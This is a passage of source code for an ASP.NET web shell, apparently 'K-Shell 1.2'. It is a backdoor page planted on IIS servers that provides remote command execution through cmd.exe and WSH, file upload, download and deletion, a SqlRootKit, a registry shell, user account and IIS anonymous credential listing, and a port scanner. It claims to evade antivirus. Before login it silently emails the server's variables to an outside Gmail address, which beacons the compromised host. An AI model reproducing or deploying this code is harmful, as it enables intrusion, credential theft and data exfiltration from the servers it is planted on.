  756.  
  757.  
  758.     public function td_force_width_(width)
  759.         td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) +  " border=0>"
  760.     end function
  761.  
  762.  
  763.     public function red_(contents)
  764.         red_ = "<font color=red>"+contents+"</font>"
  765.     end function
  766.  
  767.     public function yellow_(contents)
  768.         yellow_ = "<font color='#FF8800'>"+contents+"</font>"
  769.     end function
  770.  
  771.     public function green_(contents)
  772.         green_ = "<font color=green>"+contents+"</font>"
  773.     end function
  774.  
  775.     Public function link_(title,link,target)
  776.         link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>"
  777.     end function
  778. 'End HTML SNIPPETS 
  779.  
  780. 'Begin Scanner
  781. Public Class Scanner
  782. Public Ips As New ArrayList()
  783. Public ports As New ArrayList()
  784. Public succMsg As New StringBuilder()
  785. Public ret As ListBox
  786. Public errMsg As String = ""
  787. Public Timeout As Integer = 3000
  788. Public Sub start()
  789. Dim thread As New Thread(New ThreadStart(AddressOf Me.run))
  790. thread.Start()
  791. thread = Nothing
  792. End Sub
  793.  
  794. Public Sub run()
  795. ret.Items.Clear()
  796. For Each ip As String In Ips
  797. For Each port As String In ports
  798. 'ret.Items.Add(ip + ":" + port);
  799. Dim scanres As String = ""
  800. Try
  801. Dim tcpClient As New TcpClient()
  802. Try
  803.             tcpClient.Connect(ip, Int32.Parse(port))
  804.             tcpClient.Close()
  805.             ret.Items.Add(ip + " : " + port + " ................................. Open")
  806.       Catch e As SocketException
  807.             ret.Items.Add(ip + " : " + port + " ................................. Close")
  808. End Try
  809. tcpClient.Close()
  810. Catch exp As SocketException
  811. errMsg = "ErrorCode : " + exp.ErrorCode.ToString() + " : " + exp.Message
  812. End Try
  813. Next
  814. Next
  815. End Sub
  816. End Class
  817.  
  818. Public Function MakeIps(ByVal StartIp As String, ByVal EndIP As String) As ArrayList
  819. Dim IpList As New ArrayList()
  820. Dim IpParts1 As String() = New String(3) {}
  821. Dim IpParts2 As String() = New String(3) {}
  822. IpParts1 = StartIp.Split("."C)
  823. IpParts2 = EndIP.Split("."C)
  824. Dim nTime As Integer = (Int32.Parse(IpParts2(0)) - Int32.Parse(IpParts1(0))) * 254 * 254 * 254 + (Int32.Parse(IpParts2(1)) - Int32.Parse(IpParts1(1))) * 254 * 254 + (Int32.Parse(IpParts2(2)) - Int32.Parse(IpParts1(2))) * 254 + (Int32.Parse(IpParts2(3)) - Int32.Parse(IpParts1(3))) + 1
  825. If nTime < 0 Then
  826. Response.Write("IP Address Error.Check" & Chr(13) & "" & Chr(10) & "")
  827. Return Nothing
  828. End If
  829. For n As Integer = 0 To nTime - 1
  830. IpList.Add(IpParts1(0) + "." + IpParts1(1) + "." + IpParts1(2) + "." + IpParts1(3))
  831. Dim tmp As Integer = Int32.Parse(IpParts1(3)) + 1
  832. IpParts1(3) = tmp.ToString()
  833. If IpParts1(3).Equals("255") Then
  834. tmp = Int32.Parse(IpParts1(2)) + 1
  835. IpParts1(2) = tmp.ToString()
  836. IpParts1(3) = "1"
  837. End If
  838. If IpParts1(2).Equals("255") Then
  839. tmp = Int32.Parse(IpParts1(1)) + 1
  840. IpParts1(1) = tmp.ToString()
  841. IpParts1(2) = "1"
  842. End If
  843. If IpParts1(1).Equals("255") Then
  844. tmp = Int32.Parse(IpParts1(0)) + 1
  845. IpParts1(0) = tmp.ToString()
  846. IpParts1(1) = "1"
  847.  
  848. End If
  849. Next
  850. Return IpList
  851. End Function
  852.  
  853.  
  854. Protected Sub btnScan_Click(ByVal sender As Object, ByVal e As EventArgs)
  855. If txtStartIP.Text = "" OrElse txtEndIP.Text = "" OrElse txtPorts.Text = "" Then
  856. Response.Write("IP OR Ports Error.Check")
  857. Return
  858. End If
  859. Dim StartIp As String = txtStartIP.Text
  860. Dim EndIp As String = txtEndIP.Text
  861. Dim ips As ArrayList = MakeIps(StartIp, EndIp)
  862. Dim ScanPorts As New ArrayList()
  863. Dim ports As String() = txtPorts.Text.Split(","C)
  864. For Each port As String In ports
  865. 'Response.Write(port);
  866. ScanPorts.Add(port)
  867. Next
  868. lstRet.Visible = True
  869. Label1.Visible = True
  870. Dim myscanner As New Scanner()
  871. myscanner.Ips = ips
  872. myscanner.ports = ScanPorts
  873. myscanner.ret = Me.lstRet
  874. myscanner.run()
  875. End Sub
  876.  
  877. Protected Sub btnReset_Click(ByVal sender As Object, ByVal e As EventArgs)
  878. txtStartIP.Text = ""
  879. txtEndIP.Text = ""
  880. txtPorts.Text = ""
  881. Label1.Visible = False
  882. lstRet.Visible = False
  883. End Sub
  884. 'End Scanner
  885. </script>
  886. <%
  887. if request.QueryString("action")="down" and session("rooot")=1 then
  888.         downTheFile(request.QueryString("src"))
  889.         response.End()
  890. end if
  891. Dim act as string = request.QueryString("action")
  892. if act="cmd" then
  893. TITLE="CMD.NET"
  894. elseif act="cmdw32" then
  895. TITLE="ASP.NET W32 Shell"
  896. elseif act="cmdwsh" then
  897. TITLE="ASP.NET WSH Shell"
  898. elseif act="sqlrootkit" then
  899. TITLE="SqlRootKit.NET"
  900. elseif act="clonetime" then
  901. TITLE="Clone Time"
  902. elseif act="information" then
  903. TITLE="Web Server Info"
  904. elseif act="goto" then
  905. TITLE="K-Shell 1.2"
  906. elseif act="pro1" then
  907. TITLE="List processes from server"
  908. elseif act="pro2" then
  909. TITLE="List processes from server"
  910. elseif act="user" then
  911. TITLE="List User Accounts"
  912. elseif act="applog" then
  913. TITLE="List Application Event Log Entries"
  914. elseif act="syslog" then
  915. TITLE="List System Event Log Entries"
  916. elseif act="auser" then
  917. TITLE="IIS List Anonymous' User details"
  918. elseif act="sqlman" then
  919. TITLE="MSSQL Management"
  920. elseif act="scan" then
  921. TITLE="Port Scanner"
  922. elseif act="iisspy" then
  923. TITLE="IIS Spy"
  924. elseif act="sqltool" then
  925. TITLE="SQL Tool"
  926. elseif act="regshell" then
  927. TITLE="Registry Shell"
  928. else
  929. TITLE=request.ServerVariables("HTTP_HOST")
  930. end if
  931. %>
  932. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  933. <html>
  934. <style>
  935. body{background-color:#444;color:#e1e1e1;}
  936. body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
  937. table.info{ color:#fff;background-color:#222; }
  938. span,h1,a{ color: #df5 !important; }
  939. span{ font-weight: bolder; }
  940. h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
  941. div.content{ padding: 5px;margin-left:5px;background-color:#333; }
  942. a{ text-decoration:none; }
  943. a:hover{ text-decoration:underline; }
  944. .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  945. .bigarea{ width:100%;height:300px; }
  946. input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
  947. form{ margin:0px; }
  948. .toolsInp{ width: 300px }
  949. .main th{text-align:left;background-color:#5e5e5e;}
  950. .main tr:hover{background-color:#5e5e5e}
  951. .l1{background-color:#444}
  952. .l2{background-color:#333}
  953. pre{font-family:Courier,Monospace;}
  954. </style>
  955. <head>
  956. <meta http-equiv="Content-Type" content="text/html">
  957. <title></title>
  958. </head>
  959. <body>
  960. <hr>
  961. <%
  962. Dim error_x as Exception
  963. Try
  964. if session("rooot")<>1 then
  965. 'Test sending anonymous mail, comment it if you don't want test it
  966.     dim info As String
  967.     Try
  968.     info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline)
  969.     System.Web.Mail.SmtpMail.SmtpServer = "localhost"
  970.     System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info)
  971.     Catch
  972.     End Try
  973. %>
  974. <center>
  975. <form runat="server">
  976.   Your Password:<asp:TextBox ID="TextBox" runat="server"  TextMode="Password" class="TextBox" />  
  977.   <asp:Button  ID="Button" runat="server" Text="Login" ToolTip="Click here to login"  OnClick="login_click" class="buttom" />
  978. </form>
  979. </center>
  980. <%
  981. else
  982.     dim temp as string
  983.     temp=request.QueryString("action")
  984.     if temp="" then temp="goto"
  985.     select case temp
  986.     case "goto"
  987.         if request.QueryString("src")<>"" then
  988.             url=request.QueryString("src")
  989.         else
  990.             url=server.MapPath(".") & "\"
  991.         end if
  992.     call existdir(url)
  993.     dim xdir as directoryinfo
  994.     dim mydir as new DirectoryInfo(url)
  995.     dim guru as string
  996.     dim xfile as fileinfo
  997.    
  998.     dim ServerIP As string = "<font color=white>Server IP :</font> <b>" + Request.ServerVariables("LOCAL_ADDR") + "</b> - <font color=white>Client IP :</font> <b>" + getIP() + "</b> - "
  999.     dim HostName As string = "<font color=white>HostName :</font> <b>" + Environment.MachineName + "</b> - <font color=white>Username :</font> <b>"+ Environment.UserName +"</b><br>"
  1000.     dim OSVersion As string = "<font color=white>OS Version :</font> <b>" + Environment.OSVersion.ToString() + "</b>"
  1001.     dim IISversion As string = "<font color=white> - IIS Version :</font> <b>" + Request.ServerVariables("SERVER_SOFTWARE") + "</b><br><font color=white>System Dir :</font> <b>" + Environment.SystemDirectory + "</b>"
  1002.     dim PATH_INFO As string = "<font color=white> - PATH_TRANSLATED :</font> <b>" + Request.ServerVariables("PATH_TRANSLATED") + "</b><br>"
  1003.     dim HARDWARE_INFO As string = ""
  1004.     Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
  1005.     Dim de As DictionaryEntry
  1006.     For Each de In  environmentVariables
  1007.     if de.Key = "NUMBER_OF_PROCESSORS" then
  1008.     HARDWARE_INFO += "<font color=white>Hardware Info :</font> <b>" + de.Value + "CPU - "
  1009.     end if
  1010.     if de.Key = "PROCESSOR_IDENTIFIER" then
  1011.     HARDWARE_INFO += de.Value + "</b><br>"
  1012.     end if
  1013.     Next
  1014.     Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO
  1015. %>
  1016. <table width="100%"  border="0" align="center">
  1017.   <tr>
  1018.     <td><asp:Label ID="Info" runat="server" EnableViewState="False" /></td>
  1019.   </tr>
  1020. </table>
  1021. <hr>
  1022.  
  1023. <table width="100%"  border="0" align="center">
  1024.   <tr>
  1025.     <td>Currently Dir:</td> <td><font color=red><%=url%></font></td>
  1026.   </tr>
  1027.   <tr>
  1028.     <td width="10%">Operate:</td>
  1029.     <td width="90%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> -
  1030.       <%if session("cutboard")<>"" then%>
  1031.       <a href="?action=paste&src=<%=server.UrlEncode(url)%>" title="you can paste">Paste</a> -
  1032.       <%else%>
  1033.     Paste -
  1034. <%end if%>
  1035. <a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit" ><font color="red">Quit</font></a>
  1036. </td>
  1037.   </tr>
  1038.   <tr>
  1039.     <td>
  1040.     Go to: </td>
  1041.     <td>
  1042. <%
  1043. dim i as integer
  1044. for i =0 to Directory.GetLogicalDrives().length-1
  1045.     response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
  1046. next
  1047. %>
  1048.  
  1049. </td>
  1050. <td align="Left">
  1051. <%
  1052. response.Write("IP:<font color=red>" & Request.ServerVariables("REMOTE_ADDR")&"</font>")
  1053. %>
  1054. </td>
  1055.   </tr>
  1056.  
  1057.   <tr>
  1058.     <td>Tool:</td>
  1059.     <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro1" >List Processes 1</a> - <a href="?action=pro2" >List Processes 2</a></td>    
  1060.   </tr>
  1061.   <tr>
  1062.     <td> </td>
  1063.     <td><a href="?action=user" >List User Accounts</a> - <a href="?action=auser" >IIS Anonymous User</a>- <a href="?action=scan" >Port Scanner</a> - <a href="?action=iisspy" >IIS Spy</a> - <a href="?action=applog" >Application Event Log </a> - <a href="?action=syslog" >System Log</a></td>
  1064.   </tr>
  1065. </table>
  1066. <hr>
  1067. <table width=100% class=main cellspacing=0 cellpadding=1><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>
  1068.  
  1069.  
  1070.       <tr>
  1071.         <td><%
  1072.         guru= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><b>[..]</b></a></td></tr>"
  1073.         response.Write(guru)
  1074.                 dim lll
  1075.                 lll=1
  1076.         for each xdir in mydir.getdirectories()
  1077.             response.Write("<tr>")
  1078.             dim filepath as string
  1079.             filepath=server.UrlEncode(url & xdir.name)
  1080.                         if lll=1 then
  1081.                            lll=2
  1082.                         else
  1083.                            lll=1
  1084.                         end if
  1085.             guru= "<tr class=l" & lll & "><td><a href='?action=goto&src=" & filepath & "\" & "'><b>[" & xdir.name & "]</b></a></td>"
  1086.             response.Write(guru)
  1087.             response.Write("<td>&lt;dir&gt;</td>")
  1088.             response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
  1089.             guru="<td><a href='?action=cut&src=" & filepath & "\'  target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\'  target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
  1090.             response.Write(guru)
  1091.             response.Write("</tr>")
  1092.         next
  1093.         %></td>
  1094.   </tr>
  1095.         <tr>
  1096.         <td><%
  1097.         for each xfile in mydir.getfiles()
  1098.             dim filepath2 as string
  1099.             filepath2=server.UrlEncode(url & xfile.name)
  1100.             response.Write("<tr>")
  1101.                         if lll=1 then
  1102.                            lll=2
  1103.                         else
  1104.                            lll=1
  1105.                         end if
  1106.                         guru= "<tr class=l" & lll & "><td><a href='?action=edit&src=" & filepath2 & "'>" & xfile.name & "</a></td>"
  1107.             response.Write(guru)
  1108.             guru="<td>" & GetSize(xfile.length) & "</td>"
  1109.             response.Write(guru)
  1110.             response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
  1111.             guru="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"           
  1112.             response.Write(guru)
  1113.             response.Write("</tr>")
  1114.         next
  1115.         response.Write("</table>")
  1116.         %></td>
  1117.       </tr>
  1118. </table>
  1119. <script language="javascript">
  1120. function del()
  1121. {
  1122. if(confirm("Are you sure?")){return true;}
  1123. else{return false;}
  1124. }
  1125. function down()
  1126. {
  1127. if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
  1128. else{return false;}
  1129. }
  1130. </script>
  1131. <%
  1132. case "information"
  1133.     dim CIP,CP as string
  1134.     if getIP()<>request.ServerVariables("REMOTE_ADDR") then
  1135.             CIP=getIP()
  1136.             CP=request.ServerVariables("REMOTE_ADDR")
  1137.     else
  1138.             CIP=request.ServerVariables("REMOTE_ADDR")
  1139.             CP="None"
  1140.     end if
  1141. %>
  1142. <div align=center>[ Web Server Information ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></div><br>
  1143. <table width="100%"  border="1" align="center">
  1144.   <tr>
  1145.     <td width="40%">Server IP</td>
  1146.     <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  1147.   </tr>
  1148.   <tr>
  1149.     <td height="73">Machine Name</td>
  1150.     <td><%=Environment.MachineName%></td>
  1151.   </tr>
  1152.   <tr>
  1153.     <td>Network Name</td>
  1154.     <td><%=Environment.UserDomainName.ToString()%></td>
  1155.   </tr>
  1156.   <tr>
  1157.     <td>User Name in this Process</td>
  1158.     <td><%=Environment.UserName%></td>
  1159.   </tr>
  1160.   <tr>
  1161.     <td>OS Version</td>
  1162.     <td><%=Environment.OSVersion.ToString()%></td>
  1163.   </tr>
  1164.   <tr>
  1165.     <td>Started Time</td>
  1166.     <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  1167.   </tr>
  1168.   <tr>
  1169.     <td>System Time</td>
  1170.     <td><%=now%></td>
  1171.   </tr>
  1172.   <tr>
  1173.     <td>IIS Version</td>
  1174.     <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  1175.   </tr>
  1176.   <tr>
  1177.     <td>HTTPS</td>
  1178.     <td><%=request.ServerVariables("HTTPS")%></td>
  1179.   </tr>
  1180.   <tr>
  1181.     <td>PATH_INFO</td>
  1182.     <td><%=request.ServerVariables("PATH_INFO")%></td>
  1183.   </tr>
  1184.   <tr>
  1185.     <td>PATH_TRANSLATED</td>
  1186.     <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  1187.   <tr>
  1188.     <td>SERVER_PORT</td>
  1189.     <td><%=request.ServerVariables("SERVER_PORT")%></td>
  1190.   </tr>
  1191.     <tr>
  1192.     <td>SeesionID</td>
  1193.     <td><%=Session.SessionID%></td>
  1194.   </tr>
  1195.   <tr>
  1196.     <td colspan="2"><span class="style3">Client Infomation</span></td>
  1197.   </tr>
  1198.   <tr>
  1199.     <td>Client Proxy</td>
  1200.     <td><%=CP%></td>
  1201.   </tr>
  1202.   <tr>
  1203.     <td>Client IP</td>
  1204.     <td><%=CIP%></td>
  1205.   </tr>
  1206.   <tr>
  1207.     <td>User</td>
  1208.     <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  1209.   </tr>
  1210. </table>
  1211. <table align=center>
  1212.     <% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
  1213.     <tr>
  1214.         <td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td>
  1215.         <td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td>
  1216.     </tr>
  1217. </table>
  1218. <%
  1219.     case "cmd"
  1220. %>
  1221. <form runat="server">
  1222.   <p>[ CMD.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1223.   <p> Execute command with ASP.NET account(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  1224.   <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p>
  1225.   Command:
  1226.   <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  1227.   <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/>  
  1228.   <p>
  1229.    <asp:Label ID="result" runat="server" style="style2"/>      </p>
  1230. </form>
  1231. <%
  1232.     case "cmdw32"
  1233. %>
  1234. <form runat="server">
  1235.     <p>[ ASP.NET W32 Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1236.     <p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  1237.     <%
  1238.     Response.Write("System Dir : "+Environment.SystemDirectory +"<br><br>")
  1239.     %>
  1240.     CMD File:
  1241.     <asp:TextBox ID="txtCmdFile" runat="server" Width="473px" style="border: 1px solid #084B8E">C:\\WINDOWS\\system32\\cmd.exe</asp:TextBox><br><br>
  1242.     Command:&nbsp;
  1243.     <asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/>
  1244.     <asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  1245.     <p>
  1246.     <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/>      
  1247.     </p>
  1248. </form>
  1249. <%
  1250.     case "cmdwsh"
  1251. %>
  1252. <form runat="server">
  1253.     <p>[ ASP.NET WSH Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1254.     <p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  1255.     Command:
  1256.     <asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/>
  1257.     <asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  1258.     <p>
  1259.     <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/>      
  1260.     </p>
  1261. </form>
  1262. <%
  1263.     case "pro1"
  1264. %>
  1265. <form runat="server">
  1266.     <p align=center>[ List processes from server ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1267.     <table align=center>
  1268.         <tr>
  1269.             <td>
  1270.             <%
  1271.                 Try
  1272.                 output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount")
  1273.                 Catch
  1274.                 rw("This function is disabled by server")
  1275.                 End Try
  1276.             %>
  1277.             </td>
  1278.         </tr>
  1279.     </table>
  1280. </form>
  1281. <%
  1282.     case "pro2"
  1283. %>
  1284. <form runat="server">
  1285.     <p align=center>[ List processes from server ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1286.     <table align=center width='80%'>
  1287.         <tr>
  1288.             <td>
  1289.             <%
  1290.                 Dim htmlbengin As String = "<table width='80%' align=center border=0><tr align=center><td width='20%'><b>ID</b></td><td align=left width='20%'><b>Process</b></td><td align=left width='20%'><b>MemorySize</b></td><td align=center width='10%'><b>Threads</b></td></tr>"
  1291.                   Dim prostr As String = ""
  1292.                   Dim htmlend As String = "</tr></table>"
  1293.                   Try
  1294.                         Dim mypro As Process() = Process.GetProcesses()
  1295.                         For Each p As Process In mypro
  1296.                               prostr += "<tr><td align=center>" + p.Id.ToString() + "</td>"
  1297.                               prostr += "<td align=left>" + p.ProcessName.ToString() + "</td>"
  1298.                               prostr += "<td align=left>" + p.WorkingSet.ToString() + "</td>"
  1299.                               prostr += "<td align=center>" + p.Threads.Count.ToString() + "</td>"
  1300.                         Next
  1301.                   Catch ex As Exception
  1302.                         Response.write(ex.Message)
  1303.                   End Try
  1304.                   Response.write(htmlbengin + prostr + htmlend)
  1305.             %>
  1306.             </td>
  1307.         </tr>
  1308.     </table>
  1309. </form>
  1310. <%
  1311.     case "user"
  1312. %>
  1313. <form runat="server">
  1314.     <p align=center>[ List User Accounts ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1315.     <table align=center>
  1316.         <tr>
  1317.             <td>
  1318.             <%
  1319.                 dim WMI_function = "Win32_UserAccount"     
  1320.                 dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID"
  1321.                 dim fail_description = " Access to " + WMI_function + " is protected"
  1322.                 Try
  1323.                 output_wmi_function_data(WMI_function,Fields_to_load)
  1324.                 Catch
  1325.                 rw(fail_description)
  1326.                 End Try
  1327.             %>
  1328.             </td>
  1329.         </tr>
  1330.     </table>
  1331. </form>
  1332. <%
  1333.     case "reg"
  1334. %>
  1335. <form runat="server">
  1336.     <p align=center>[ Registry ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1337.     <table align=center>
  1338.         <tr>
  1339.             <td>
  1340.             <%
  1341.                 dim WMI_function = "Win32_Registry"    
  1342.                 dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status"
  1343.                 dim fail_description = " Access to " + WMI_function + " is protected"
  1344.                 Try
  1345.                 output_wmi_function_data(WMI_function,Fields_to_load)
  1346.                 Catch
  1347.                 rw(fail_description)
  1348.                 End Try
  1349.             %>
  1350.             </td>
  1351.         </tr>
  1352.     </table>
  1353. </form>
  1354. <%
  1355.     case "applog"
  1356. %>
  1357. <form runat="server">
  1358.     <p align=center>[ List Application Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1359.     <table align=center>
  1360.         <tr>
  1361.             <td>
  1362.             <%
  1363.                 dim WMI_function = "Win32_NTLogEvent where Logfile='Application'"      
  1364.                 dim Fields_to_load = "Logfile,Message,type"
  1365.                 dim fail_description = " Access to " + WMI_function + " is protected"
  1366.                 Try
  1367.                 output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
  1368.                 Catch
  1369.                 rw(fail_description)
  1370.                 End Try
  1371.             %>
  1372.             </td>
  1373.         </tr>
  1374.     </table>
  1375. </form>
  1376. <%
  1377.     case "syslog"
  1378. %>
  1379. <form runat="server">
  1380.     <p align=center>[ List System Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1381.     <table align=center>
  1382.         <tr>
  1383.             <td>
  1384.             <%
  1385.                 dim WMI_function = "Win32_NTLogEvent where Logfile='System'"       
  1386.                 dim Fields_to_load = "Logfile,Message,type"
  1387.                 dim fail_description = " Access to " + WMI_function + " is protected"
  1388.                
  1389.                 Try
  1390.                 output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
  1391.                 Catch
  1392.                 rw("This function is disabled by server")
  1393.                 End Try
  1394.             %>
  1395.             </td>
  1396.         </tr>
  1397.     </table>
  1398. </form>
  1399. <%
  1400.     case "auser"
  1401. %>
  1402. <form runat="server">
  1403.     <p align=center>[ IIS List Anonymous' User details ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1404.     <table align=center>
  1405.         <tr>
  1406.             <td>
  1407.             <%
  1408.                 Try
  1409.                 IIS_list_Anon_Name_Pass
  1410.                 Catch
  1411.                 rw("This function is disabled by server")
  1412.                 End Try
  1413.             %>
  1414.             </td>
  1415.         </tr>
  1416.     </table>
  1417. </form>
  1418. <%
  1419.     case "scan"
  1420. %>
  1421.     <form runat="server">
  1422.     <p>[ ASP.NET Port Scanner ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1423.     <div>
  1424.         C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)<br /><br />
  1425.         Start IP :&nbsp;&nbsp;<asp:TextBox ID="txtStartIP" runat="server" Width="177px">127.0.0.1</asp:TextBox>
  1426.         &nbsp;&nbsp; &nbsp; --- &nbsp;End Ip : &nbsp;<asp:TextBox ID="txtEndIP" runat="server" Width="185px">127.0.0.1</asp:TextBox>&nbsp;
  1427.         <br />
  1428.         Ports &nbsp;&nbsp;&nbsp;:&nbsp;&nbsp;<asp:TextBox ID="txtPorts" runat="server" Width="473px">21,25,80,1433,3306,3389</asp:TextBox><br />
  1429.         <br />
  1430.         <asp:Button ID="btnScan" runat="server" Text="Scan" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnScan_Click" />
  1431.         &nbsp;&nbsp;
  1432.         <asp:Button ID="btnReset" runat="server" Text="Reset" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnReset_Click" /><br />
  1433.         <br />
  1434.         <asp:Label ID="Label1" runat="server" Text="Result:" Visible="False" Width="70px"></asp:Label><br />
  1435.         <asp:ListBox ID="lstRet" runat="server" BackColor="Black" ForeColor="#00C000" Height="251px"
  1436.             Width="527px" Visible="False"></asp:ListBox>
  1437.         <hr align=left style="width: 526px" />
  1438.         <br />
  1439.        </div>
  1440.     </form>
  1441. <%
  1442. case "iisspy"
  1443. %>
  1444.     <p align=center>[ IIS Spy ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1445.     <%
  1446.                 Try
  1447.                 Response.write(IISSpy())
  1448.                 Catch
  1449.                 rw("This function is disabled by server")
  1450.                 End Try
  1451.     %>
  1452. <%
  1453. case "sqltool"
  1454. %>
  1455.     <p align=center>[ SQL Tool ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1456.     <%
  1457.                 Try
  1458.                
  1459.                 Catch
  1460.                 rw("This function is disabled by server")
  1461.                 End Try
  1462.     %>
  1463. <%
  1464. case "regshell"
  1465. %>
  1466.     <form runat="server">
  1467.     <p align=center >[ Registry Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
